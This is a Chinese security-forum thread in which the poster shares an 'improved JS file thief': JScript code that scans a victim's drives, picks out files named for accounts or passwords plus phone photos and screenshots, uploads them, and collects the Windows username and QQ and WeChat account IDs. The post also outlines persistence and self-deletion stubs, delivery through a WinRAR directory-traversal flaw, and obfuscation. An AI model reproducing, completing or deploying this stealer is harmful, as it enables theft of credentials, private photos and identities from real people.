搜索
    Hi~登录注册
    查看: 271|回复: 2
    收起左侧

    js小偷改进版,可获取QQ、微信号,可获取账号密码隐私照...

    [复制链接]

    5

    主题

    0

    精华

    3 小时

    在线时间

    新手上路

    Rank: 1

    积分
    3
    发表于 2019-6-12 21:46:32 | 显示全部楼层 |阅读模式
    本帖最后由 Freebuf科技叔 于 2019-6-12 09:50 PM 编辑

    引用原贴:【社工辅助】js文件小偷
    https://bbs.secgeeker.net/thread-1257-1-1.html

    在原版代码上做了一些改进,主要有:

    1. 盘符倒序排列扫描,提高效率,核心代码:
    [JavaScript] 纯文本查看 复制代码
    function descsort(v1, v2) {
            if (v1 > v2)
            {
                    return -1;
            } else if (v1 < v2)
            {
                    return 1;
            } else {
                    return 0;
            }
    }
    
    var DriveList = DriveList.sort(descsort);
    2. 修改原获取文件正则,支持获取文件名含"账号"、"密码"、"account"、"password"等文件,观察大部分手机图片为.JPG、截图为.PNG格式,加上获取此类手机照片功能
    核心代码:
    [JavaScript] 纯文本查看 复制代码
                    if (/((账号|密码|password|passwd|account)+(.*)*\.(txt|doc|docx|xls|xlsx)$)|(\.(JPG|PNG)$)/.test(FileList[i][1])) {
                            UpFile(FileList[i][0], FileList[i][1])
                    }

    3. 支持获取目标电脑用户名,可上传到后台作为用户标识,核心代码:
    [JavaScript] 纯文本查看 复制代码
    function GetUserName() {
            var WshNetwork = new ActiveXObject("WScript.Network"); 
            var UserName = WshNetwork.UserName;
            return UserName; 
    }
    
    XHR.setRequestHeader('userName', USERNAME);

    4. 支持获取QQ号、微信号,从Tencent Files和WeChat Files目录获取,核心代码:
    [JavaScript] 纯文本查看 复制代码
    function GetQQWechat() {
            var QQList = [];
            var WechatList = [];
            var QQPath = "C:\\Users\\" + USERNAME+ "\\Documents\\Tencent Files"
            var WechatPath = "C:\\Users\\" + USERNAME+ "\\Documents\\WeChat Files"
            var Patt = new RegExp(/[^\\]+$/);
            if (FSO.folderExists(QQPath)) {
                    var QQFolderList = GetFolderList(QQPath);
                    if (QQFolderList) {
                            for (var i = 0; i < QQFolderList.length; i++) {
                                    var QQFolderStr = QQFolderList[i];
                                    var QQResult = Patt.exec(QQFolderStr);
                                    var QQ = "";
                                    if (QQResult) QQ = QQResult[0];
                                    if (QQ == "All Users") continue;
                                    QQList.push(QQ);
                            }
                    }
            }
            if (FSO.folderExists(WechatPath)) {
                    var WechatFolderList = GetFolderList(WechatPath);
                    if (WechatFolderList) {
                            for (var i = 0; i < WechatFolderList.length; i++) {
                                    var WechatFolderStr = WechatFolderList[i];
                                    var WechatResult = Patt.exec(WechatFolderStr);
                                    var Wechat = "";
                                    if (WechatResult) Wechat = WechatResult[0];
                                    if (Wechat == "All Users") continue;
                                    WechatList.push(Wechat);
                            }
                    }
            }
            return {"QQList":QQList, "WechatList":WechatList}
    }

    5.留几个彩蛋:
    [JavaScript] 纯文本查看 复制代码
    function GetCurrentFilePath() {
    
    }
    
    function CheckIsXP() {
    
    }
    
    function CopyToStartUp() {
    
    }
    
    function DelSelf() {
    
    }

    6. 可配合winrar解压目录穿越漏洞使用,亦可单击执行使用 - 低调求发展 - 老牌第三方民间网络安全交流平台6 X, H: W7 s3 J" [% _, p  r6 R% x

    7.最终代码可加混淆加密www.t00ls.net2 f$ K2 b8 j$ H; s8 f

    8.仅作技术交流讨论,望理解,谢谢!

    附效果图:
    QQ截图20190612214619.png





    上一篇:【社工辅助】js文件小偷【下载链接失效】
    下一篇:打扰一下大佬们
    回复

    使用道具 举报

    19

    主题

    0

    精华

    121 小时

    在线时间

    新手上路

    Rank: 1

    积分
    44
    发表于 2019-6-13 08:05:12 | 显示全部楼层
    链接全部失效了
    回复 支持 反对

    使用道具 举报

    5

    主题

    0

    精华

    3 小时

    在线时间

    新手上路

    Rank: 1

    积分
    3
     楼主| 发表于 2019-6-13 14:38:32 | 显示全部楼层

    。。。
    大表哥上面的链接都是我本地测试获取到 的链接啊
    这里分享的是思路js代码啊大哥.....
    回复 支持 反对

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表